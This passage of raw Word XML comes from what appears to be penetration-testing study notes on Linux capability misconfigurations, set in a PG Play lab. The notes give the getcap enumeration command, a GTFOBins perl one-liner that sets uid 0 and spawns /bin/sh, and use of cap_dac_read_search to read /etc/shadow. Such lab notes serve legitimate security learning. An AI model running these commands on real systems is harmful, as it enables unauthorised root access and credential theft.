        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to perform a recursive search starting from the root folder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, filtering out any errors from the terminal output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002345">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002346">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002347">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79" name="image76.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image76.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74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2348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002349">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two perl binaries stand out as they have setuid capabilities enabled, along with the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> +ep flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specifying that these capabilities are</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> effective </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Effective (E) and Permitted (P) → the capability is active and the program can use it when executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Permitted only → the capability is allowed but not currently in effect unless explicitly enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Effective only → rare, means it’s active but not necessarily permitted for all operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No flags</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → the capability is not set at all.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002350">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though they seem similar, capabilities, setuid, and the setuid flag are located in different places within the Linux ELF file format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002351">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002352">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit this capability misconfiguration, we could check the GTFOBins website. This site provides an organized list of UNIX binaries and how can they be misused to elevate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002353">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002354">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Searching for "Perl" on the GTFOBins website, we'll find precise instructions for which command to use to exploit capabilities. We'll use the whole command, which executes a shell along with a few POSIX directives enabling setuid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002355">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002356">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="346" name="image358.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image358.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74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2357">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002358">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002359">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We managed to gain a root shell via yet another misconfiguration vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qy2v5sn4nswu" w:id="314"/>
      <w:bookmarkEnd w:id="314"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId746">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EmpireBreakout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to use these capabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002360">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002361">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you might have seen in the previous screenshot, the we can see the single file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which is in fact and executable (called ELF). We can confirm this with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002362">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="482600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId747"/>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2363">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002364">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002365">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="72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getcap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the command that will show us any capabilities set for executables and files on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="72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-r /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Makes the check recursive from the root file, so checks everything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002368">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="72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2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Will throw any errors that appear into the 'bin' before they come to standard output, keeping the console tidy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002369">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3157538" cy="520276"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="238" name="image227.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image227.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId748"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3157538" cy="520276"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the image we can see that the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executable has the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_read_search=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I think the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means 'effective and permitted'. If we look at the capabilities manual page it says that this specific capability allows "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass file read permission checks and directory read and execute permission checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" … Yes please, don't mind if I do.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, now armed with this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command that can bypass file read permissions etc, we can start grabbing files we shouldn't normally see…Such as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file…Spoiler, still didn't get the password from this, but it was a good idea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
